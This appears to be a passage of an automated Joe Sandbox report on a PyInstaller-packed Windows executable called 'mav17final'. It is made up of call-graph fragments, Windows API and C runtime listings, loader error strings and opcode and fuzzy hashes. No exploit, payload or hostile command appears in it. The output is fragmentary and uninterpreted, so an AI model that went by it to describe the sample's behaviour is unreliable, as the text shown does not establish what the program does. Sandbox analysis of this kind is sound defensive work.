calls 16924->16925 16928 7ff79ea523d6 16925->16928 16927 7ff79ea4eff8 33 API calls 16926->16927 16931 7ff79ea52401 16927->16931 16929 7ff79ea567c8 _invalid_parameter_noinfo 30 API calls 16928->16929 16942 7ff79ea523e1 16929->16942 16932 7ff79ea52433 16931->16932 16943 7ff79ea52d50 16931->16943 16933 7ff79ea5249a 16932->16933 16934 7ff79ea5137c _wfindfirst32i64 13 API calls 16932->16934 16935 7ff79ea5137c _wfindfirst32i64 13 API calls 16933->16935 16938 7ff79ea52595 16933->16938 16937 7ff79ea524d6 16934->16937 16936 7ff79ea5258a 16935->16936 16940 7ff79ea567c8 _invalid_parameter_noinfo 30 API calls 16936->16940 16941 7ff79ea567c8 _invalid_parameter_noinfo 30 API calls 16937->16941 16939 7ff79ea5137c _wfindfirst32i64 13 API calls 16938->16939 16938->16942 16939->16942 16940->16938 16941->16933 16942->16861 16944 7ff79ea52d9c 16943->16944 16946 7ff79ea52d73 16943->16946 16956 7ff79ea5be48 16944->16956 16947 7ff79ea52d7e 16946->16947 16949 7ff79ea5be78 16946->16949 16947->16931 16950 7ff79ea4eff8 33 API calls 16949->16950 16952 7ff79ea5beb1 16950->16952 16957 7ff79ea59630 33 API calls 16956->16957 16958 7ff79ea5be51 16957->16958 16977 7ff79ea489e0 16 API calls 16976->16977 17024 7ff79ea59630 33 API calls 17023->17024 17025 7ff79ea56411 17024->17025 17026 7ff79ea56530 33 API calls 17025->17026 17027 7ff79ea56427 17026->17027 18019 7ff79ea594b0 18020 7ff79ea594b5 18019->18020 18021 7ff79ea594ca 18019->18021 18025 7ff79ea594d0 18020->18025 18026 7ff79ea5951a 18025->18026 18027 7ff79ea59512 18025->18027 18029 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18026->18029 18028 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18027->18028 18028->18026 18030 7ff79ea59527 18029->18030 18031 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18030->18031 18032 7ff79ea59534 18031->18032 18033 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18032->18033 18034 7ff79ea59541 18033->18034 18035 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18034->18035 18036 7ff79ea5954e 18035->18036 18037 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18036->18037 18038 7ff79ea5955b 18037->18038 18039 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18038->18039 18040 7ff79ea59568 18039->18040 18041 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18040->18041 18042 7ff79ea59575 18041->18042 18043 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18042->18043 18044 7ff79ea59585 18043->18044 18045 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18044->18045 18046 7ff79ea59595 18045->18046 18051 7ff79ea59374 18046->18051 18065 7ff79ea5c1c8 EnterCriticalSection 18051->18065 17749 7ff79ea57830 17750 7ff79ea57859 17749->17750 17753 7ff79ea57871 17749->17753 17751 7ff79ea5135c _fread_nolock 13 API calls 17750->17751 17754 7ff79ea5785e 17751->17754 17752 7ff79ea578eb 17755 7ff79ea5135c _fread_nolock 13 API calls 17752->17755 17753->17752 17758 7ff79ea578a2 17753->17758 17756 7ff79ea5137c _wfindfirst32i64 13 API calls 17754->17756 17757 7ff79ea578f0 17755->17757 17772 7ff79ea57866 17756->17772 17759 7ff79ea5137c _wfindfirst32i64 13 API calls 17757->17759 17773 7ff79ea53f3c EnterCriticalSection 17758->17773 17761 7ff79ea578f8 17759->17761 17763 7ff79ea567c8 _invalid_parameter_noinfo 30 API calls 17761->17763 17763->17772 18067 7ff79ea65797 18068 7ff79ea657a7 18067->18068 18071 7ff79ea512b8 LeaveCriticalSection 18068->18071 18072 7ff79ea5d1a0 18083 7ff79ea62e78 18072->18083 18084 7ff79ea62ea3 18083->18084 18085 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18084->18085 18086 7ff79ea62ebb 18084->18086 18085->18084 18087 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18086->18087 18088 7ff79ea5d1a9 18086->18088 18087->18086 18089 7ff79ea5c1c8 EnterCriticalSection 18088->18089 17774 7ff79ea4e290 17775 7ff79ea4e2d5 17774->17775 17776 7ff79ea4e2b2 17774->17776 17775->17776 17778 7ff79ea4e2da 17775->17778 17777 7ff79ea5137c _wfindfirst32i64 13 API calls 17776->17777 17779 7ff79ea4e2b7 17777->17779 17787 7ff79ea512ac EnterCriticalSection 17778->17787 17781 7ff79ea567c8 _invalid_parameter_noinfo 30 API calls 17779->17781 17784 7ff79ea4e2c2 17781->17784 18671 7ff79ea55d90 18674 7ff79ea55d10 18671->18674 18681 7ff79ea5c1c8 EnterCriticalSection 18674->18681 18709 7ff79ea6596e 18710 7ff79ea6597d 18709->18710 18711 7ff79ea65987 18709->18711 18713 7ff79ea5c228 LeaveCriticalSection 18710->18713 18138 7ff79ea658f3 18141 7ff79ea512b8 LeaveCriticalSection 18138->18141 17631 7ff79ea53a64 17632 7ff79ea53acb 17631->17632 17633 7ff79ea53a92 17631->17633 17632->17633 17634 7ff79ea53ad0 FindFirstFileExW 17632->17634 17635 7ff79ea5137c _wfindfirst32i64 13 API calls 17633->17635 17636 7ff79ea53b39 17634->17636 17637 7ff79ea53af2 GetLastError 17634->17637 17638 7ff79ea53a97 17635->17638 17691 7ff79ea53cd4 17636->17691 17640 7ff79ea53b0c 17637->17640 17641 7ff79ea53afd 17637->17641 17642 7ff79ea567c8 _invalid_parameter_noinfo 30 API calls 17638->17642 17646 7ff79ea5137c _wfindfirst32i64 13 API calls 17640->17646 17645 7ff79ea53b29 17641->17645 17649 7ff79ea53b07 17641->17649 17650 7ff79ea53b19 17641->17650 17643 7ff79ea53aa2 17642->17643 17651 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 17643->17651 17647 7ff79ea5137c _wfindfirst32i64 13 API calls 17645->17647 17646->17643 17647->17643 17648 7ff79ea53cd4 _wfindfirst32i64 10 API calls 17652 7ff79ea53b5f 17648->17652 17649->17640 17649->17645 17653 7ff79ea5137c _wfindfirst32i64 13 API calls 17650->17653 17654 7ff79ea53ab6 17651->17654 17655 7ff79ea53cd4 _wfindfirst32i64 10 API calls 17652->17655 17653->17643 17656 7ff79ea53b6d 17655->17656 17657 7ff79ea5c364 _wfindfirst32i64 30 API calls 17656->17657 17658 7ff79ea53b8b 17657->17658 17658->17643 17659 7ff79ea53b97 17658->17659 17660 7ff79ea567e8 _wfindfirst32i64 17 API calls 17659->17660 17661 7ff79ea53bab 17660->17661 17662 7ff79ea53bd5 17661->17662 17665 7ff79ea53c14 FindNextFileW 17661->17665 17663 7ff79ea5137c _wfindfirst32i64 13 API calls 17662->17663 17664 7ff79ea53bda 17663->17664 17666 7ff79ea567c8 _invalid_parameter_noinfo 30 API calls 17664->17666 17667 7ff79ea53c23 GetLastError 17665->17667 17668 7ff79ea53c64 17665->17668 17682 7ff79ea53be5 17666->17682 17670 7ff79ea53c3d 17667->17670 17671 7ff79ea53c2e 17667->17671 17669 7ff79ea53cd4 _wfindfirst32i64 10 API calls 17668->17669 17673 7ff79ea53c7c 17669->17673 17672 7ff79ea5137c _wfindfirst32i64 13 API calls 17670->17672 17674 7ff79ea53c57 17671->17674 17678 7ff79ea53c38 17671->17678 17679 7ff79ea53c4a 17671->17679 17672->17682 17677 7ff79ea53cd4 _wfindfirst32i64 10 API calls 17673->17677 17676 7ff79ea5137c _wfindfirst32i64 13 API calls 17674->17676 17675 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 17681 7ff79ea53bf8 17675->17681 17676->17682 17683 7ff79ea53c8a 17677->17683 17678->17670 17678->17674 17680 7ff79ea5137c _wfindfirst32i64 13 API calls 17679->17680 17680->17682 17682->17675 17684 7ff79ea53cd4 _wfindfirst32i64 10 API calls 17683->17684 17685 7ff79ea53c98 17684->17685 17686 7ff79ea5c364 _wfindfirst32i64 30 API calls 17685->17686 17687 7ff79ea53cb6 17686->17687 17687->17682 17688 7ff79ea53cbe 17687->17688 17689 7ff79ea567e8 _wfindfirst32i64 17 API calls 17688->17689 17690 7ff79ea53cd2 17689->17690 17692 7ff79ea53cec 17691->17692 17693 7ff79ea53cf2 FileTimeToSystemTime 17691->17693 17692->17693 17695 7ff79ea53d17 17692->17695 17694 7ff79ea53d01 SystemTimeToTzSpecificLocalTime 17693->17694 17693->17695 17694->17695 17696 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 17695->17696 17697 7ff79ea53b51 17696->17697 17697->17648 17698 7ff79ea559e0 17699 7ff79ea559fd GetModuleHandleW 17698->17699 17700 7ff79ea55a47 17698->17700 17699->17700 17706 7ff79ea55a0a 17699->17706 17708 7ff79ea558d8 17700->17708 17706->17700 17722 7ff79ea55ae8 GetModuleHandleExW 17706->17722 17728 7ff79ea5c1c8 EnterCriticalSection 17708->17728 17723 7ff79ea55b2d 17722->17723 17724 7ff79ea55b0e GetProcAddress 17722->17724 17726 7ff79ea55b3d 17723->17726 17727 7ff79ea55b37 FreeLibrary 17723->17727 17724->17723 17725 7ff79ea55b25 17724->17725 17725->17723 17726->17700 17727->17726

                                                  Executed Functions

                                                  Function 00007FF79EA61528 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 280timeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 134 7ff79ea61528-7ff79ea61568 call 7ff79ea60eb8 call 7ff79ea60ec0 call 7ff79ea60f28 141 7ff79ea6156e-7ff79ea61579 call 7ff79ea60ec8 134->141 142 7ff79ea617a6-7ff79ea617f1 call 7ff79ea567e8 call 7ff79ea60eb8 call 7ff79ea60ec0 call 7ff79ea60f28 134->142 141->142 147 7ff79ea6157f-7ff79ea61589 141->147 169 7ff79ea617f7-7ff79ea61802 call 7ff79ea60ec8 142->169 170 7ff79ea6192f-7ff79ea6199d call 7ff79ea567e8 call 7ff79ea5d06c 142->170 150 7ff79ea6158b-7ff79ea6158e 147->150 151 7ff79ea615af-7ff79ea615b3 147->151 154 7ff79ea61591-7ff79ea6159c 150->154 152 7ff79ea615b6-7ff79ea615be 151->152 152->152 155 7ff79ea615c0-7ff79ea615d3 call 7ff79ea58c00 152->155 157 7ff79ea6159e-7ff79ea615a5 154->157 158 7ff79ea615a7-7ff79ea615a9 154->158 164 7ff79ea61789-7ff79ea6178c call 7ff79ea56830 155->164 165 7ff79ea615d9-7ff79ea615eb call 7ff79ea56830 155->165 157->154 157->158 158->151 161 7ff79ea61791-7ff79ea617a5 158->161 164->161 176 7ff79ea615f2-7ff79ea615fa 165->176 169->170 177 7ff79ea61808-7ff79ea61813 call 7ff79ea60ef8 169->177 187 7ff79ea619a6-7ff79ea619a9 170->187 188 7ff79ea6199f-7ff79ea619a4 170->188 176->176 179 7ff79ea615fc-7ff79ea6160a call 7ff79ea5c364 176->179 177->170 186 7ff79ea61819-7ff79ea6183c call 7ff79ea56830 GetTimeZoneInformation 177->186 179->142 189 7ff79ea61610-7ff79ea61669 call 7ff79ea4d010 * 4 call 7ff79ea61444 179->189 200 7ff79ea61904-7ff79ea6192e call 7ff79ea60eb0 call 7ff79ea60ea0 call 7ff79ea60ea8 186->200 201 7ff79ea61842-7ff79ea61863 186->201 191 7ff79ea619ab-7ff79ea619ae 187->191 192 7ff79ea619b0-7ff79ea619c3 call 7ff79ea58c00 187->192 193 7ff79ea619f7-7ff79ea61a09 188->193 247 7ff79ea6166b-7ff79ea6166f 189->247 191->193 208 7ff79ea619ce-7ff79ea619e9 call 7ff79ea5d06c 192->208 209 7ff79ea619c5 192->209 197 7ff79ea61a0b-7ff79ea61a0e 193->197 198 7ff79ea61a1a call 7ff79ea617bc 193->198 197->198 203 7ff79ea61a10-7ff79ea61a18 call 7ff79ea61528 197->203 212 7ff79ea61a1f-7ff79ea61a4b call 7ff79ea56830 call 7ff79ea4bbf0 198->212 206 7ff79ea6186e-7ff79ea61875 201->206 207 7ff79ea61865-7ff79ea6186b 201->207 203->212 216 7ff79ea61877-7ff79ea6187f 206->216 217 7ff79ea61889 206->217 207->206 229 7ff79ea619eb-7ff79ea619ee 208->229 230 7ff79ea619f0 208->230 218 7ff79ea619c7-7ff79ea619cc call 7ff79ea56830 209->218 216->217 225 7ff79ea61881-7ff79ea61887 216->225 222 7ff79ea6188b-7ff79ea618ff call 7ff79ea4d010 * 4 call 7ff79ea5e51c call 7ff79ea61a4c * 2 217->222 218->191 222->200 225->222 229->218 230->193 236 7ff79ea619f2 call 7ff79ea56830 230->236 236->193 249 7ff79ea61675-7ff79ea61679 247->249 250 7ff79ea61671 247->250 249->247 252 7ff79ea6167b-7ff79ea616a2 call 7ff79ea52e20 249->252 250->249 258 7ff79ea616a5-7ff79ea616a9 252->258 260 7ff79ea616ab-7ff79ea616b6 258->260 261 7ff79ea616b8-7ff79ea616bc 258->261 260->261 263 7ff79ea616be-7ff79ea616c2 260->263 261->258 264 7ff79ea616c4-7ff79ea616ec call 7ff79ea52e20 263->264 265 7ff79ea61743-7ff79ea61748 263->265 274 7ff79ea616ee 264->274 275 7ff79ea6170a-7ff79ea6170e 264->275 268 7ff79ea6174a-7ff79ea6174c 265->268 269 7ff79ea6174f-7ff79ea6175c 265->269 268->269 270 7ff79ea6175e-7ff79ea61775 call 7ff79ea61444 269->270 271 7ff79ea61778-7ff79ea61787 call 7ff79ea60eb0 call 7ff79ea60ea0 269->271 270->271 271->164 278 7ff79ea616f1-7ff79ea616f8 274->278 275->265 280 7ff79ea61710-7ff79ea6172e call 7ff79ea52e20 275->280 278->275 281 7ff79ea616fa-7ff79ea61708 278->281 286 7ff79ea6173a-7ff79ea61741 280->286 281->275 281->278 286->265 287 7ff79ea61730-7ff79ea61734 286->287 287->265 288 7ff79ea61736 287->288 288->286
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _get_daylight$_invalid_parameter_noinfo$InformationTimeZone
                                                  • String ID: Eastern Standard Time$Eastern Summer Time
                                                  • API String ID: 435049134-239921721
                                                  • Opcode ID: e7c50473f2d1b68994f71ab5a92372937e29ed2205e94bdf24f420ae8b7c5c88
                                                  • Instruction ID: 3f1d05117fe9848d03c93c5805853d37ee66a3fcb08faeaeaf589f156a3d12bc
                                                  • Opcode Fuzzy Hash: e7c50473f2d1b68994f71ab5a92372937e29ed2205e94bdf24f420ae8b7c5c88
                                                  • Instruction Fuzzy Hash: A2B1C126F18A5285E730FF3299C097EA661EBA5B84F804135EA4D437A5DF3DE4418770
                                                  Function 00007FF79EA47850 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 141COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • GetTempPathW.KERNEL32(00000000,?,00000000,00000000,?,00007FF79EA4154F), ref: 00007FF79EA478E7
                                                    • Part of subcall function 00007FF79EA47A60: GetEnvironmentVariableW.KERNEL32(00007FF79EA439EF), ref: 00007FF79EA47A9A
                                                    • Part of subcall function 00007FF79EA47A60: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF79EA47AB7
                                                    • Part of subcall function 00007FF79EA53A04: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79EA53A1D
                                                  • SetEnvironmentVariableW.KERNEL32 ref: 00007FF79EA479A1
                                                    • Part of subcall function 00007FF79EA42B30: MessageBoxW.USER32 ref: 00007FF79EA42C01
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
                                                  • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                                                  • API String ID: 3752271684-1116378104
                                                  • Opcode ID: cc5afa02db89ddc83501fa16cb079789694df4e71eccec7261dd1a3086ea0bde
                                                  • Instruction ID: 594b17c6973fefa9f700aff95bea9c17dcc8abda59e3d4f6f046d026e027b854
                                                  • Opcode Fuzzy Hash: cc5afa02db89ddc83501fa16cb079789694df4e71eccec7261dd1a3086ea0bde
                                                  • Instruction Fuzzy Hash: 2B516D61B0968251FAB4B7326891ABED292DF85BD4FC45031FD0E4B7A7ED2CE4058370
                                                  Function 00007FF79EA617BC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 149timeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 766 7ff79ea617bc-7ff79ea617f1 call 7ff79ea60eb8 call 7ff79ea60ec0 call 7ff79ea60f28 773 7ff79ea617f7-7ff79ea61802 call 7ff79ea60ec8 766->773 774 7ff79ea6192f-7ff79ea6199d call 7ff79ea567e8 call 7ff79ea5d06c 766->774 773->774 779 7ff79ea61808-7ff79ea61813 call 7ff79ea60ef8 773->779 786 7ff79ea619a6-7ff79ea619a9 774->786 787 7ff79ea6199f-7ff79ea619a4 774->787 779->774 785 7ff79ea61819-7ff79ea6183c call 7ff79ea56830 GetTimeZoneInformation 779->785 796 7ff79ea61904-7ff79ea6192e call 7ff79ea60eb0 call 7ff79ea60ea0 call 7ff79ea60ea8 785->796 797 7ff79ea61842-7ff79ea61863 785->797 789 7ff79ea619ab-7ff79ea619ae 786->789 790 7ff79ea619b0-7ff79ea619c3 call 7ff79ea58c00 786->790 791 7ff79ea619f7-7ff79ea61a09 787->791 789->791 803 7ff79ea619ce-7ff79ea619e9 call 7ff79ea5d06c 790->803 804 7ff79ea619c5 790->804 794 7ff79ea61a0b-7ff79ea61a0e 791->794 795 7ff79ea61a1a call 7ff79ea617bc 791->795 794->795 799 7ff79ea61a10-7ff79ea61a18 call 7ff79ea61528 794->799 807 7ff79ea61a1f-7ff79ea61a4b call 7ff79ea56830 call 7ff79ea4bbf0 795->807 801 7ff79ea6186e-7ff79ea61875 797->801 802 7ff79ea61865-7ff79ea6186b 797->802 799->807 809 7ff79ea61877-7ff79ea6187f 801->809 810 7ff79ea61889 801->810 802->801 821 7ff79ea619eb-7ff79ea619ee 803->821 822 7ff79ea619f0 803->822 811 7ff79ea619c7-7ff79ea619cc call 7ff79ea56830 804->811 809->810 817 7ff79ea61881-7ff79ea61887 809->817 815 7ff79ea6188b-7ff79ea618ff call 7ff79ea4d010 * 4 call 7ff79ea5e51c call 7ff79ea61a4c * 2 810->815 811->789 815->796 817->815 821->811 822->791 827 7ff79ea619f2 call 7ff79ea56830 822->827 827->791
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _get_daylight_invalid_parameter_noinfo$InformationLanguagesPreferredRestoreThreadTimeZone
                                                  • String ID: Eastern Standard Time$Eastern Summer Time
                                                  • API String ID: 1896592209-239921721
                                                  • Opcode ID: e1c1c7a162c756eaab80c75e9d554066937552a0643beb88d9c76aad1a05689b
                                                  • Instruction ID: b9dc869ddf1034e5d895449248d22639bac0ef97427e5dc2fae6a1bf4150e471
                                                  • Opcode Fuzzy Hash: e1c1c7a162c756eaab80c75e9d554066937552a0643beb88d9c76aad1a05689b
                                                  • Instruction Fuzzy Hash: F6617E32E18A4286E770FF31D9C19B9A761EBA9B84F804135EA4D43BA5DF3DE4418770
                                                  Function 00007FF79EA487C0 Relevance: 3.0, APIs: 2, Instructions: 31COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID:
                                                  • API String ID: 2295610775-0
                                                  • Opcode ID: fd09611004a722f78990fd31eac2e868677f50c986bcb1b3b02d4ba43189d950
                                                  • Instruction ID: 8344d03b3d1b530d8e1f6fbcf2db9e40ff0a722b6d5445c8cd2fe83b7b45093b
                                                  • Opcode Fuzzy Hash: fd09611004a722f78990fd31eac2e868677f50c986bcb1b3b02d4ba43189d950
                                                  • Instruction Fuzzy Hash: B5014431A1998186F7B0AB30F49977AB3A0EB857A4FC04335D66D436E5DF3CD0098B20
                                                  Function 00007FF79EA5C448 Relevance: 1.9, APIs: 1, Instructions: 439COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 21c370f8ab2909275d10110dd99fbc6577511caaf5376d97bbda2fb82b934d79
                                                  • Instruction ID: ffe4f390e6a310e01bb35cce1e367b5ab2c84a427e3635c6b45eff464a8448ed
                                                  • Opcode Fuzzy Hash: 21c370f8ab2909275d10110dd99fbc6577511caaf5376d97bbda2fb82b934d79
                                                  • Instruction Fuzzy Hash: 0802BA61E1964380EE70BB35A885A3DA681EF41BA0FC84635DE6D477F9EE3DA4018330
                                                  Function 00007FF79EA41710 Relevance: 24.6, APIs: 1, Strings: 13, Instructions: 148COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 7ff79ea41710-7ff79ea41724 1 7ff79ea4173e-7ff79ea41742 0->1 2 7ff79ea41726-7ff79ea4173d call 7ff79ea42b30 0->2 4 7ff79ea41768-7ff79ea4178b call 7ff79ea47b10 1->4 5 7ff79ea41744-7ff79ea4174d call 7ff79ea412b0 1->5 11 7ff79ea417b9-7ff79ea417d4 call 7ff79ea43fa0 4->11 12 7ff79ea4178d-7ff79ea417b8 call 7ff79ea42890 4->12 13 7ff79ea4175f-7ff79ea41767 5->13 14 7ff79ea4174f-7ff79ea4175a call 7ff79ea42b30 5->14 20 7ff79ea417ee-7ff79ea41801 call 7ff79ea4e498 11->20 21 7ff79ea417d6-7ff79ea417e9 call 7ff79ea42b30 11->21 14->13 27 7ff79ea41823-7ff79ea41827 20->27 28 7ff79ea41803-7ff79ea4181e call 7ff79ea42890 20->28 26 7ff79ea4192f-7ff79ea41932 call 7ff79ea4deac 21->26 33 7ff79ea41937-7ff79ea4194e 26->33 29 7ff79ea41829-7ff79ea41835 call 7ff79ea41050 27->29 30 7ff79ea41841-7ff79ea41861 call 7ff79ea50f60 27->30 39 7ff79ea41927-7ff79ea4192a call 7ff79ea4deac 28->39 37 7ff79ea4183a-7ff79ea4183c 29->37 40 7ff79ea41882-7ff79ea41888 30->40 41 7ff79ea41863-7ff79ea4187d call 7ff79ea42890 30->41 37->39 39->26 44 7ff79ea4188e-7ff79ea41897 40->44 45 7ff79ea41915-7ff79ea41918 call 7ff79ea50f4c 40->45 49 7ff79ea4191d-7ff79ea41922 41->49 48 7ff79ea418a0-7ff79ea418c2 call 7ff79ea4e1c8 44->48 45->49 52 7ff79ea418f5-7ff79ea418fc 48->52 53 7ff79ea418c4-7ff79ea418dc call 7ff79ea4e6f0 48->53 49->39 54 7ff79ea41903-7ff79ea4190b call 7ff79ea42890 52->54 58 7ff79ea418de-7ff79ea418e1 53->58 59 7ff79ea418e5-7ff79ea418f3 53->59 62 7ff79ea41910 54->62 58->48 61 7ff79ea418e3 58->61 59->54 61->62 62->45
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Message
                                                  • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc$pyi_arch_extract2fs was called before temporary directory was initialized!
                                                  • API String ID: 2030045667-3833288071
                                                  • Opcode ID: 41bcd50f58ba6945afefbac69a197c6087a234d6bd2d16567869e118860fe969
                                                  • Instruction ID: c4997af73b388bcc28a2872c67de1a20f62466076905234dca37b507a2c4f7a6
                                                  • Opcode Fuzzy Hash: 41bcd50f58ba6945afefbac69a197c6087a234d6bd2d16567869e118860fe969
                                                  • Instruction Fuzzy Hash: D1516F61B0CA4285EB30BB35E490AB9E391EFA5B94FC44531DE0D4B6B6EE2CE5458730
                                                  Function 00007FF79EA48850 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 90COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(0000000100000001,00007FF79EA4411C,00007FF79EA47811,?,00007FF79EA47C26,?,00007FF79EA41785), ref: 00007FF79EA48890
                                                  • OpenProcessToken.ADVAPI32(?,00007FF79EA47C26,?,00007FF79EA41785), ref: 00007FF79EA488A1
                                                  • GetTokenInformation.KERNELBASE(?,00007FF79EA47C26,?,00007FF79EA41785), ref: 00007FF79EA488C3
